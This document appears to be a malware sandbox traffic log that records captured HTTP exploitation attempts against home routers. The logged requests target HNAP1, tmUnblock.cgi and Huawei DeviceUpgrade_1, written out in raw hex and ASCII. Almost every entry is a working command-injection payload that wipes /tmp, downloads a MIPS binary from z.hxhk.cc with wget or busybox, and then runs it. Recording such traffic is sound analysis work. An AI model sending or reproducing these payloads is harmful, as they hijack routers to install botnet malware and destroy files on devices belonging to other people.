Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
